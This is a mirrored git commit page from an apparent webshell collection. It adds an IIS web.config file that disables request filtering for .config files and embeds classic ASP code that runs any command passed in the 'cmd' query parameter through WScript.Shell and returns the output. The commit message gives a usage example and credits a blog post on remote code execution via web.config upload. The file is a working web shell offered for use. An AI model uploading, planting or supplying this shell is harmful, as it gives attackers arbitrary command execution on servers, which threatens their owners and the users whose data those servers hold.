mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
Create web.config
use: /web.config?cmd=whoami from: https://sethjackson.github.io/2018/10/27/rce-through-web-config-upload/
This commit is contained in:
parent
67733cfcdc
commit
77618164ad
1 changed files with 32 additions and 0 deletions
32
aspx/web.config
Normal file
32
aspx/web.config
Normal file
|
@ -0,0 +1,32 @@
|
|||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<configuration>
|
||||
<system.webServer>
|
||||
<handlers accessPolicy="Read, Script, Write">
|
||||
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
|
||||
</handlers>
|
||||
<security>
|
||||
<requestFiltering>
|
||||
<fileExtensions>
|
||||
<remove fileExtension=".config" />
|
||||
</fileExtensions>
|
||||
<hiddenSegments>
|
||||
<remove segment="web.config" />
|
||||
</hiddenSegments>
|
||||
</requestFiltering>
|
||||
</security>
|
||||
</system.webServer>
|
||||
</configuration>
|
||||
<!--
|
||||
<%
|
||||
Response.Write("-"&"->")
|
||||
|
||||
Function GetCommandOutput(command)
|
||||
Set shell = CreateObject("WScript.Shell")
|
||||
Set exec = shell.Exec(command)
|
||||
GetCommandOutput = exec.StdOut.ReadAll
|
||||
End Function
|
||||
|
||||
Response.Write(GetCommandOutput("cmd /c " + Request("cmd")))
|
||||
Response.Write("<!-"&"-")
|
||||
%>
|
||||
-->
|
Loading…
Reference in a new issue